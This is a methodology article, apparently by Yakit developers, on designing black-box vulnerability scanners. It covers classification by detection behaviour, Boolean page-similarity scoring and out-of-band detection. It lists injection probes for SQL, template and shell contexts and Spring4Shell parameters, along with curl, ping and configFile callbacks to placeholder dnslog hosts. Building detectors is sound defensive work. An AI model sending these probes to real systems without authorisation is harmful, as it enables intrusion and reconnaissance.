An abstract methodology for black-box vulnerability scanning and for assessing risk detection techniques

As engineers who have long wrestled with automated detection and discovery of all kinds of vulnerabilities, we run into many problems when writing a “scanner”, such as:

How do we make sure a payload is harmless?
How do we balance the number of requests sent against the “detection rate”?
How do we trigger the WAF as little as possible?
How do we find as many security issues as possible when authorized (or when the WAF can be ignored)?
Are there “best practices” for the different ways vulnerabilities manifest?

In this article I will try to give some of my own answers to the above questions:

Classifying vulnerabilities by detection behavior

Classifying vulnerabilities is actually a strange topic. Many vulnerabilities are essentially the same: SQL injection, template injection, code injection, XSS, even command injection and deserialization all come down to executing “user input as code”. If we accept this mental model, exploiting these vulnerabilities reduces to a simple pipeline: construct the payload => send the request => check the behavior triggered by the vulnerability.

Although vulnerabilities can be classified by trigger scenario, by language, or by framework, in this section we propose an “alternative” classification: classification by vulnerability detection behavior.

The term may sound unfamiliar, so we divide vulnerability detection into the following cases to make it easy to understand.

1. The payload produces a clear characteristic string in the echo, and the echo changes with the payload.
    For example, if {{2*2}} returns 4, it indicates SSTI.
    If `expr 2 + 2` echoes 4, it may be *unix command injection.
    If the payload is name' and a SQL error is returned directly, error-based SQL injection is possible.
2. The payload is echoed, but the characteristics are not obvious; a Boolean judgment can still be constructed.
    For example, the page for {{2*2}} is the same as the page for 4 but different from the page for 5 (the output of {{2 + 3}}). This can also indicate SSTI.
    If the results of name=tom'and'1'='1 and name=tom'and'2'='1 are not the same (not similar), and the former is very similar to name=tom, we consider “Boolean-based SQL injection” possible.
3. There is no text echo and no outbound request can be constructed, but a delay can be constructed.
    The most common case is time-based SQL injection. We construct name=tom'and/**/sleep(3) # and, if the injection succeeds, the response is delayed by at least 3 seconds (think about why we say “at least”).
    benchmark can usually stand in for sleep, but this approach is generally not recommended.
    Note that if sleep can be executed through template injection, it generally means arbitrary code can be executed, so a more “accurate” detection method is available and there is no need to rely on sleep. After all, nobody designing a template engine wants users to be able to block it.
4. There is no text echo, but outbound requests can be constructed.
    DNS egress: for example, the DNSLog method commonly used to confirm the well-known log4j2 vulnerability.
    TCP / HTTP egress: random port trigger, see https://m.freebuf.com/sectool/320955.html?hmsr=joyk.com&utm_source=joyk.com&utm_medium=referral
    ICMP egress: try executing ping 192.168.1.1 to determine whether ICMP can leave the network, whether the command was executed, or whether an ICMP tunnel can be built.
5. Special case: no text, no echo, no outbound network, no DNS.
    This does not mean the vulnerability is “undetectable”. Case: the “echo chain” often used in Java deserialization is a special payload that turns a vulnerability with no outbound access and no echo into one with an echo and obvious features.
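
For the delay-based case, the “at least” can be made concrete with a small timing check. This is only a sketch in Python: the function name, the use of a median baseline, and the jitter allowance are assumptions made for illustration and do not come from any tool mentioned in this article.

```python
import statistics


def looks_delayed(baseline_times, observed_time, sleep_seconds, jitter=0.5):
    """Return True if observed_time is consistent with an injected sleep.

    baseline_times: response times (seconds) of normal requests.
    jitter: hypothetical allowance for network fluctuation.
    """
    baseline = statistics.median(baseline_times)
    # The injected sleep is added on top of normal processing and network
    # time, so the total can only be "at least" sleep_seconds.
    if observed_time < sleep_seconds:
        return False
    # A page that is already slow must get slower still by about sleep_seconds.
    return observed_time >= baseline + sleep_seconds - jitter
```

Comparing against a baseline rather than a fixed number is what keeps a naturally slow page from being reported, which is one source of the false positives discussed later.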

Why are they classified this way?

This classification matters a great deal for vulnerability detection. We can construct different payloads to test a parameter, and during detection those payloads change how the application behaves.

With this abstraction as a basis, we can enumerate the detection methods that correspond to each behavior, predict how a given payload is triggered and detected, and quickly decide whether a “vulnerability” can be detected at scale or only through fuzzing.

The payload is what changes the “detection behavior”

Once readers accept the idea of classifying detection by how a vulnerability manifests, we can analyze black-box detection more deeply. We find that even for the same vulnerability at the same trigger point, different payloads behave in completely different ways.

Take the familiar Java deserialization as a typical example.

If ysoserial generates a deserialization stream that executes ping xxx.dnslog.cn or curl http://xxx.dnslog.cn, this is the commonly used DNSLog style of detection.
If an echo chain is constructed in Java, Java code runs during deserialization, and the execution result is located and “put” back into the response to the original triggering request.
We can even execute ping 192.168.1.1 and judge by whether the target IP receives the corresponding ICMP packet.

Once we understand this, we can think carefully about “how a payload should be constructed to detect more effectively”.

Measurement of vulnerability detection methods

How do we measure a vulnerability detection method? The metrics are similar to, but not the same as, those used for machine learning methods:

False negative rate (lower is better): vulnerabilities that should have been detected but were not.
False positive rate (lower is better): a vulnerability is reported where none actually exists.
Recall rate (higher is better): whether the method can reliably re-detect the same vulnerability; it indicates the stability of the detection algorithm.
Complexity (lower is better): the conditions that must be in place for detection, such as support from a reverse-connection platform.

Generally speaking, each class of “vulnerability detection behavior” described above has different strengths on these four metrics. We score each one out of 10, where a higher score is better:

Detection method	False negative rate score	False positive rate score	Recall rate score (excluding network factors)	Complexity score	Overall performance (out of 10)	Defects
Characteristic echo (including echo chains)	9 (cannot handle the scenario where SSRF is triggered against its own machine)	10	10	10	9.75
Boolean echo	8 (depends on the algorithm that Booleanizes the application response)	8 (depends on the algorithm that Booleanizes the application response)	10	8 (the algorithm is complex)	8.5	The Boolean algorithm is the core, for example page similarity comparison
No echo (delay detection only)	8 (sensitive to the production environment)	6 (sensitive to the production environment and strongly affected by network fluctuations)	8 (basically stable; computation / sleep is not stable enough)	9 (take care not to harm the business)	7.75	Sleep / benchmark cause serious problems when they hit a bad SQL statement. Different injection positions in a SQL statement yield different sleep times, so the payload needs special construction
Multi-protocol outbound reverse connection	9 (limited by the target's outbound network restrictions)	9 (a token-like mechanism can greatly reduce false positives)	10	4 (requires a configured reverse-connection platform and places high demands on it)	8	Payloads for multiple protocols must be tried, and ordering them by generality and risk needs careful thought
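
The overall column is consistent with a plain average of the four per-metric scores. That reading is an inference from the numbers, not something the table states; the short Python sketch below simply recomputes it, with dictionary keys chosen here for illustration.

```python
# Scores per method, in table order:
# (false negative, false positive, recall, complexity)
SCORES = {
    "characteristic echo": (9, 10, 10, 10),
    "boolean echo": (8, 8, 10, 8),
    "delay only": (8, 6, 8, 9),
    "reverse connection": (9, 9, 10, 4),
}


def overall(scores):
    """Unweighted mean of the four metric scores (an assumed formula)."""
    return sum(scores) / len(scores)


# Methods ordered from best to worst overall score.
ranking = sorted(SCORES, key=lambda name: overall(SCORES[name]), reverse=True)
```

An unweighted mean treats complexity as being as important as the false positive rate; a team with a reverse-connection platform already in place might reasonably weight complexity lower.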

Based on experience, we built the scoring table above. From a vulnerability detection perspective we found:

Characteristic echo (including echo chains) is the best detection method
As alternatives, algorithm-dependent Boolean echo and reverse-connection detection are also acceptable
Do not use delay-based detection unless absolutely necessary

How to construct an excellent Payload

Having covered the topics above, readers should have a preliminary idea of what an “excellent vulnerability detection algorithm” looks like. Let's move from theory to practice: how do we construct an excellent payload?

Guessing and breaking boundaries

The boundary is the key point at which many payloads trigger; being able to break out of the boundary is what allows a payload to execute.

When we scan for a particular vulnerability, we need to know its scenarios well and look for boundaries as the point of breakthrough. Here are some scenarios to give a feel for which boundaries may exist and what closing them looks like.

For example, common boundaries in SQL are:

Space
/**/
Single quotes (closing a string)
Double quotes (less common because of escaping issues)
Parentheses (multi-condition logical queries)
Backticks (used to quote identifiers such as table and column names)
Comments
Semicolon (stacked statements)

Similarly, common string boundaries in XSS are:

Angle brackets and closing tags
Double and single quotes (to break out of attribute values)
Line breaks (to break out of the current statement in JS)
Backticks (used in place of parentheses to force a boundary), etc.
…

In addition, the punctuation marks and invisible characters that we often use to bypass regular expressions or other restrictions make very good boundary tests:

In Yakit Fuzz, we can generate all characters directly with {{range(00,ff)}} to try to break the boundary, use {{range(00,20)}} and {{range(80,ff)}} to target invisible characters around the boundary, or use {{punc}} to generate all punctuation.
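
For readers without Yakit at hand, the same candidate sets can be approximated in a few lines of Python. This is only a sketch of what the tags are described as producing, not Yakit's implementation; the helper names are hypothetical, and `string.punctuation` covers ASCII punctuation only.

```python
import string


def byte_range(start, end):
    """Single-byte candidates from start to end, inclusive."""
    return [bytes([b]) for b in range(start, end + 1)]


# Every possible byte, like the 00..ff range described above.
all_bytes = byte_range(0x00, 0xFF)
# Control characters, space, and high bytes: the "invisible" candidates.
invisible = byte_range(0x00, 0x20) + byte_range(0x80, 0xFF)
# ASCII punctuation only.
punctuation = [c.encode() for c in string.punctuation]


def with_boundary(value, candidates):
    """Append each candidate boundary byte to the original parameter value."""
    return [value + c for c in candidates]
```

For example, `with_boundary(b"1", punctuation)` yields one test value per punctuation character, each of which can be sent and compared against the response for the untouched value.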

Constructing a payload with a characteristic echo

To make this easier to understand, we briefly summarize several common scenarios:

1. Illegal input error -> detect the error message:
This is common in error-based SQL injection. For example, if we enter a single quote (') and something like a SQL syntax error appears on the page, we can tentatively conclude that our input broke the boundary of the SQL statement.
In Yakit, we use a very common set of error-based injection detection rules (SQL Injection Detection (Zero Protection)):

DBMS_ERRORS = {
    "MySQL": [`SQL syntax.*MySQL`, `Warning.*mysql_.*`, `valid MySQL result`, `MySqlClient\.`],
    "PostgreSQL": [`PostgreSQL.*ERROR`, `Warning.*\Wpg_.*`, `valid PostgreSQL result`, `Npgsql\.`],
    "Microsoft SQL Server": [`Driver.* SQL[\-\_\ ]*Server`, `OLE DB.* SQL Server`, `(\W|\A)SQL Server.*Driver`, `Warning.*mssql_.*`, `(\W|\A)SQL Server.*[0-9a-fA-F]{8}`, `(?s)Exception.*\WSystem\.Data\.SqlClient\.`, `(?s)Exception.*\WRoadhouse\.Cms\.`],
    "Microsoft Access": [`Microsoft Access Driver`, `JET Database Engine`, `Access Database Engine`],
    "Oracle": [`\bORA-[0-9][0-9][0-9][0-9]`, `Oracle error`, `Oracle.*Driver`, `Warning.*\Woci_.*`, `Warning.*\Wora_.*`],
    "IBM DB2": [`CLI Driver.*DB2`, `DB2 SQL error`, `\bdb2_\w+\(`],
    "SQLite": [`SQLite/JDBCDriver`, `SQLite.Exception`, `System.Data.SQLite.SQLiteException`, `Warning.*sqlite_.*`, `Warning.*SQLite3::`, `\[SQLITE_ERROR\]`],
    "Sybase": [`(?i)Warning.*sybase.*`, `Sybase message`, `Sybase.*Server message.*`],
}
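
To show how such a rule set might be applied, here is a minimal Python sketch that runs a subset of the patterns against a response body. The function name is hypothetical and this is not how Yakit applies the rules internally; it only illustrates the matching step.

```python
import re

# A subset of the rules above, written as Python raw strings.
DBMS_ERRORS = {
    "MySQL": [r"SQL syntax.*MySQL", r"Warning.*mysql_.*",
              r"valid MySQL result", r"MySqlClient\."],
    "PostgreSQL": [r"PostgreSQL.*ERROR", r"Warning.*\Wpg_.*",
                   r"valid PostgreSQL result", r"Npgsql\."],
    "Oracle": [r"\bORA-[0-9][0-9][0-9][0-9]", r"Oracle error",
               r"Oracle.*Driver"],
}


def detect_dbms_error(body):
    """Return the first DBMS whose error pattern matches body, else None."""
    for dbms, patterns in DBMS_ERRORS.items():
        for pattern in patterns:
            if re.search(pattern, body):
                return dbms
    return None
```

In practice the match should be checked against the response to the original request as well: an error string that is already present before the payload is sent says nothing about the injection point.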

2. Construct a numeric calculation -> check the calculation result
Constructing a mathematical operation is actually a very good approach. Suppose the injection point is id=1. If the page for id=53456-53455 is the same as the page for id=1, while the page for id=53456 is different, we have reason to believe the arithmetic was evaluated!
The four arithmetic operators are not interchangeable here. The characters + * / are reserved in many grammars and are often used to separate, mark, or join, whereas the minus sign is used least, so subtraction is usually the easiest to construct.
There are many ways to build the detection. The table below lists common expressions and how they behave in practice. We still strongly recommend subtraction, not only because + / * are often reserved characters, but also because an expression such as 2022-01-12 is good camouflage: it works as arithmetic and also looks like a date.

Scenario	Calculation expression	Remarks
*unix shell	expr 123 - 20 - 3	Spaces cannot be omitted
	echo ${random-`expr 123 - 2 - 1`}	Uses variable expansion with a default value to construct a Linux payload
	echo 123-1-1|bc	bc is relatively simple, but this usage requires the pipe character
	echo $((123-23-3))	Shell arithmetic expansion
	echo $[123-23-3]	Shell arithmetic expansion
Windows	set /a 123-20-3	Available in CMD
Template expression injection: Jinja2 / Tornado	{{ 2023-20-3 }}	Jinja2 / Tornado
	{% raw 2023-20-3 %}	Tornado expression evaluation
EL expression injection	${2023-20-3}	Generic EL expression
JSP expression	<%=123-20-3 %>	JSP expression
PHP expression
Java FreeMarker expression	${(123-23-1)?c}	Essentially a call to c, one of FreeMarker's built-ins for numbers
	${123123.456456?string["0"]}	Formats as an integer; the result is 123123 and should not contain 456456
Java Velocity expression	#set($random=123-12-12)$random	Two steps: create a variable, then output the result. The #set directive has no #end statement
EJS	<%- 123-12-1 %>	EJS, unescaped output
	<%= 123-12-1 %>	EJS, escaped output (HTML encoding, etc.)
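
The subtraction approach can be sketched as a small generator that picks random operands, wraps the expression in a context-specific template, and checks the response for the computed result. The Python below is illustrative only: the function names, the operand ranges, and the three wrappers chosen from the table are assumptions.

```python
import random


def subtraction_probe(rng=random):
    """Return (expression, expected_result) for a random subtraction."""
    a = rng.randint(100000, 999999)
    b = rng.randint(1000, 9999)
    return f"{a}-{b}", str(a - b)


# Wrappers taken from the table above; doubled braces are str.format escapes.
TEMPLATES = {
    "jinja2": "{{{{ {expr} }}}}",
    "el": "${{{expr}}}",
    "shell": "$(({expr}))",
}


def build(template_name, expr):
    """Wrap expr in the syntax of the chosen evaluation context."""
    return TEMPLATES[template_name].format(expr=expr)


def evaluated(expr, expected, body):
    """True if the result is echoed and the raw expression is not."""
    return expected in body and expr not in body
```

Large random operands make it unlikely that the expected result appears on the page by coincidence, and requiring that the raw expression is absent filters out pages that merely reflect the input.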

3. String calculation -> check the calculation result
Just as with numbers, where the expected echo comes from evaluating a random expression, we can obtain an echo from a constructed string operation in the same position.
We won't go into specific solutions here. For each item above, the corresponding template's string operations can be filled in as needed.

4. Echo through the target's own state

This is a very typical and interesting echo method:

The Java deserialization echo chain belongs to this type. For example, the Tomcat echo chain echoes through the ThreadLocal Response, and the idea for Weblogic is basically similar.
Content returned when SSRF hits one of the target's own ports is also this type of echo. However, although SSRF can return specific content, we do not know in advance what that “specific content” will be, and it is also constrained by the HTTP protocol, so this is not easy to use.

Constructing Boolean feature payloads

Boolean algorithm

The essence of a Boolean feature payload is turning irregular input into a measurable True/False.

There are several methods and points to watch:

Directly compute the similarity of the bodies of the two HTTP responses (before and after) and set a threshold, usually 0.98
Take the status code into account, and use different similarity algorithms for different body types. For example, if the two status codes differ, the responses are very likely different too.
Responses usually carry many odd, irrelevant features. Page-comparison algorithms can mask these through generalization and similar techniques.

Admittedly, this is not simple. Suppose we build an algorithm that combines the factors above with the following weights:

Similarity comparison item	Weight	Reason / Remarks
Status code	0.3	If the status codes of two pages differ, something is fundamentally different, so this weight should be relatively large
URL (Schema + Path + URI)	0.2	If the URL is the same but the status code differs, the request content may really be different, causing the response to diverge
Body	0.4	The comparison method depends on Content-Type: JSON is best compared after sorting; XML and HTML have two options: compare the text with its *ML tags directly by similarity, or extract all strings and compare those (SQLMAP-style preprocessing)
Header	0.1	Individual headers should also influence the weight, and different headers matter differently: Set-Cookie and Content-Type carry the most, tentatively 0.33 each, with all other headers together at 0.34. The effects of GZIP and Base64 should also be excluded

With this reasoning we have a first technical design for page similarity comparison. It is most likely not final; we should implement the algorithm on this basis and refine it in real use.
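
A minimal Python sketch of the weighted comparison might look like the following. It uses `difflib.SequenceMatcher` as a stand-in text similarity and represents a response as a plain dictionary; both choices are assumptions for illustration, it skips the per-Content-Type preprocessing from the table, and it is not the implementation behind any Yak function.

```python
from difflib import SequenceMatcher

# Weights from the table above.
WEIGHTS = {"status": 0.3, "url": 0.2, "body": 0.4, "header": 0.1}
SPECIAL_HEADERS = ("Set-Cookie", "Content-Type")


def text_similarity(a, b):
    """Similarity of two strings in [0, 1]."""
    return SequenceMatcher(None, a, b).ratio()


def header_similarity(h1, h2):
    """0.33 Set-Cookie + 0.33 Content-Type + 0.34 all other headers."""
    def rest(headers):
        items = sorted(headers.items())
        return "\n".join(f"{k}: {v}" for k, v in items if k not in SPECIAL_HEADERS)
    cookie = text_similarity(h1.get("Set-Cookie", ""), h2.get("Set-Cookie", ""))
    ctype = text_similarity(h1.get("Content-Type", ""), h2.get("Content-Type", ""))
    return 0.33 * cookie + 0.33 * ctype + 0.34 * text_similarity(rest(h1), rest(h2))


def similarity(r1, r2):
    """Weighted similarity of two responses given as dicts with the keys
    status, url, headers, and body."""
    status = 1.0 if r1["status"] == r2["status"] else 0.0
    return (WEIGHTS["status"] * status
            + WEIGHTS["url"] * text_similarity(r1["url"], r2["url"])
            + WEIGHTS["body"] * text_similarity(r1["body"], r2["body"])
            + WEIGHTS["header"] * header_similarity(r1["headers"], r2["headers"]))
```

With these weights, a changed status code alone caps the score at 0.7, which matches the intent that differing status codes should weigh heavily.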

In yak-1.0.14-sp1 and later, this method can be called through judge.CompareRaw to compare two packets directly and obtain a floating-point number.

The similarity of two packets (HTTP streams) is a percentage or floating-point number, with a minimum of 0 and a maximum of 1. We commonly use:

>= 0.95 can be considered “the same”, corresponding to Boolean “True”
>= 0.85 can be considered “similar”, and can also correspond to “True” in certain scenarios
>= 0.7 can be considered “basically similar”, and can generally be treated as “True” in loose scenarios
Anything lower is considered “not the same”
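
These bands translate directly into a small helper. In the Python sketch below, the function names and the three strictness labels are hypothetical, introduced only to make the thresholds concrete.

```python
def classify(score):
    """Map a similarity score in [0, 1] to one of the bands above."""
    if score >= 0.95:
        return "same"
    if score >= 0.85:
        return "similar"
    if score >= 0.7:
        return "basically similar"
    return "different"


# Hypothetical strictness labels mapped to the minimum score treated as True.
FLOORS = {"strict": 0.95, "normal": 0.85, "loose": 0.7}


def as_bool(score, strictness="normal"):
    """Booleanize a similarity score under the chosen strictness."""
    return score >= FLOORS[strictness]
```

Making the strictness an explicit parameter keeps the choice visible at each call site, since the same score of 0.9 is True in one scenario and False in another.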

How do we use the Boolean algorithm for identification?

Case: detecting CVE-2022-22965 (Spring-Core-RCE, JDK9+):

There are currently three main detection methods:

1. The “exploitation” method: write a file and connect to the WebShell
2. The error-reporting method:
    class.module.classLoader.URLs[0] type error
    class.module.class.module.class.module …* abstract class loading error
    class.module.classLoader.DefaultAssertionStatus type error
3. DNS reverse-connection detection: class.module.classLoader.resources.context.configFile=http://*.dnslog.cn/test&class.module.classLoader.resources.context.configFile.content.aaa=xxx

The first method clearly affects the business and is not recommended. The third places some requirements on infrastructure. The most desirable option is the error-reporting method.

Why an error report rather than a “characteristic string” echo?

Because when execution succeeds, we cannot see what the “feature” is, nor do we know where the echo would appear. The characteristic of the echoed result is not obvious enough: it is not a calculation result that we chose, but an “error result”.

However, errors can be intercepted globally by the Spring framework and redirected to the home page. For that reason the error-reporting method actually has quite a few false negatives, and a poorly constructed check can still produce false positives.

But if we assume the target does return an error result, how can we use Boolean logic to decide whether the vulnerability exists? The principle is simple: build an experimental group and a control group, and control the variables.

Normal requests are recorded as Positive requests (P1)
For stability, there should be several normal requests (P2 / P3)
The type-error payload request is recorded as A

If P1 / P2 / P3 are all the same (similar) as one another, then when the payload is sent, the response to A should not be the same (similar) as any of P1 / P2 / P3. That lets us single out the “different” payload.

More specifically, take class.module.classLoader.DefaultAssertionStatus as an example. We need to send three requests:

P1: class.module.classLoader.DefaultAssertionStatus=True
P2: class.module.classLoader.DefaultAssertionStatus=False
A: class.module.classLoader.DefaultAssertionStatus=123

P1 / P2 are requests that should not produce an error, and A is a request that should. If the vulnerability exists, the results should match our experimental design:

P1 and P2 are very similar, and A is similar to neither P1 nor P2.

Of course, if possible, one more control can be added alongside P1 / P2: the result of the original request with nothing added (P3), to separate the cases better.
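
The control-group logic itself is independent of Spring and can be sketched over response bodies alone. In the Python below, the function names and the use of `difflib` with a 0.95 threshold are assumptions; any similarity measure could be substituted.

```python
from difflib import SequenceMatcher
from itertools import combinations


def similar(a, b, threshold=0.95):
    """True if two response bodies are at least threshold similar."""
    return SequenceMatcher(None, a, b).ratio() >= threshold


def payload_stands_out(controls, attack, threshold=0.95):
    """True if the controls (P1, P2, ...) agree with each other and the
    attack response (A) is similar to none of them."""
    if len(controls) < 2:
        return False  # a single control cannot show that the page is stable
    stable = all(similar(a, b, threshold) for a, b in combinations(controls, 2))
    differs = all(not similar(attack, c, threshold) for c in controls)
    return stable and differs
```

Requiring the controls to agree first is what guards against pages that vary on every request, where A would look “different” regardless of the payload.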

Case 2: designing a Boolean SQL injection detection plan

Now that we understand the basic principle of Boolean detection, let's revisit a classic case: Boolean-based SQL injection. Using id=1 as the trigger point, we design an experiment:

id=1 is P1
id=1 and 1=1/**/ is P2
id=1 and 2=1 is Negative (N1)

At the most basic level, we expect:

P1 is the same as / similar to P2
P1 is not the same as N1
P2 is not the same as N1
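
The three checks can be expressed as one function that takes a request callable. This Python sketch assumes a hypothetical `fetch(params)` that returns a response body as a string; the names and the 0.95 threshold are illustrative.

```python
from difflib import SequenceMatcher


def same(a, b, threshold=0.95):
    """True if two response bodies are at least threshold similar."""
    return SequenceMatcher(None, a, b).ratio() >= threshold


def boolean_sqli_suspected(fetch, param="id", value="1"):
    """Run the P1 / P2 / N1 experiment through fetch(params) -> body."""
    p1 = fetch({param: value})
    p2 = fetch({param: f"{value} and 1=1/**/"})
    n1 = fetch({param: f"{value} and 2=1"})
    # P1 ~ P2, while N1 differs from both.
    return same(p1, p2) and not same(p1, n1) and not same(p2, n1)
```

Passing the request function in as a parameter keeps the experiment separate from transport details, so the same logic can be exercised against a stub before touching a real target.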

After these three checks, we can make an initial judgment about whether the parameter is “problematic”. Deeper verification can then expand the Positive group: for example, test id=1 and 1=2023-2020-1-1 to check that the equation is evaluated. The same applies to other constructions that allow a “better judgment”.

After this rough screening, we have also answered questions such as “how to break through the boundary”. We can then convert the result into a simpler check, such as union select 1,2,3,4,5…, where the controllable echo makes detection more accurate.

Short summary

The “experimental plans” designed above do not achieve zero false positives and zero false negatives. When implementing them, pruning in the algorithm and the “instability” caused by network factors need to be fully considered.

Detecting vulnerabilities with multi-protocol outbound reverse connections

At present, multi-protocol outbound detection falls mainly into three groups of protocols:

UDP reverse-connection detection: represented by the DNS protocol
TCP reverse-connection detection: RMI / LDAP / HTTP / random-port reverse connection
ICMP reverse connection: based on ICMP packets of a specific length, ping -s [len] example.com

This part is not complicated; the construction can even be called very simple. There is no need to fixate on what the payload or the protocol should look like. Let's introduce it through two relatively “rare” ways of triggering a reverse connection.

TCP knockout: reverse connection to a random, non-listening port with no feature token

For most scenarios other than DNS, the vast majority of reverse-connection “detections” use TCP as the underlying protocol. By implementing protocols on top of TCP, we can stay compatible with many application-layer protocols:

For common HTTP reverse-connection detection, we generally put the token in the path to tell “which vulnerability was triggered”: http://example.com/[token]
Common RMI is similar: jndi:rmi://example.com/[token]
…
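
The token-in-path idea can be sketched as follows. The Python below is a minimal illustration: the function names, the token length, and the in-memory mapping from token to finding are all assumptions, and a real reverse-connection platform would also need the listeners themselves.

```python
import secrets


def new_token(nbytes=8):
    """Random hex token that is impractical to guess."""
    return secrets.token_hex(nbytes)


def reverse_payloads(host, token):
    """Callback addresses that carry the token in the path."""
    return {
        "http": f"http://{host}/{token}",
        "rmi": f"jndi:rmi://{host}/{token}",
    }


def match_hit(requested_path, issued):
    """Map the path of an incoming callback to the finding that issued
    the token, or None if the token is unknown."""
    return issued.get(requested_path.strip("/"))
```

Because each token is issued for exactly one payload, an incoming request with an unknown token can be discarded, which is the mechanism the scoring table credits with reducing false positives.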

However, all of the use cases above require the user to listen on a specific port. In discussion with @Naiquanshifu, we arrived at a more “universal” detection method and successfully implemented it in engineering.

Out of the Five Elements and Three Realms: ICMP Reverse Connection and Tunnel

Similarly, inspired by the solution above, let's set TCP aside. ICMP allows a comparable technique; the only difference is that ICMP has no ports. So how do we trigger an ICMP reverse connection in a similar way, and then tell which vulnerability a given ICMP packet corresponds to?

We use the simplest trigger: the ping command. The -s parameter sets the size of the ICMP packet's data. In other words, we can choose a random value in advance as the ping packet size; if the size of an incoming ping packet matches the “random value” we set, the reverse connection succeeded.
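
A small Python sketch of the idea: choose a random data size, build the ping command, and later compare it with the data length observed on the receiving side. The function names and the 100 to 1400 byte range are assumptions; the command uses the Linux flags (-c for count, -s for data bytes), while Windows ping uses -n and -l instead.

```python
import random


def ping_probe(host, rng=random):
    """Return (command, size) for a single ping with a random data size."""
    # Assumed range: away from the usual default of 56 data bytes and
    # small enough to stay under a typical MTU.
    size = rng.randint(100, 1400)
    return f"ping -c 1 -s {size} {host}", size


def is_our_probe(observed_data_len, expected_size):
    """True if an incoming echo request carries exactly the chosen size."""
    return observed_data_len == expected_size
```

Here the size plays the role that the token plays in the HTTP case: it is the only field the payload controls, so it doubles as the identifier of the vulnerability being tested.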

If we describe the above process using a simple diagram, the process is actually very easy to understand.

Why?

Why do this? Often, when outbound TCP and UDP both fail, an ICMP tunnel can still carry some data. So how do we test whether an ICMP tunnel can reach the external network? The method proposed here is a relatively quick way to find out.

Summary

This article leaves out detection based on “time injection”. The reason was given in the section on classifying vulnerabilities by detection behavior and is not repeated here.

This article does not discuss specific technical solutions in great depth; it is meant to prompt further thinking. Thanks to the Yakit users who helped through discussion and real-world implementation. I hope it can serve as part of the theoretical basis for your own “vulnerability detection” designs.

Yak official resources

Yak language official tutorial:
https://yaklang.com/docs/intro/
Yakit video tutorial:
https://space.bilibili.com/437503777
Github download address:
https://github.com/yaklang/yakit
Yakit official website download address:
https://yaklang.com/
Yakit installation documentation:
https://yaklang.com/products/download_and_install
Yakit usage documentation:
https://yaklang.com/products/intro/
Quick FAQ:
https://yaklang.com/products/FAQ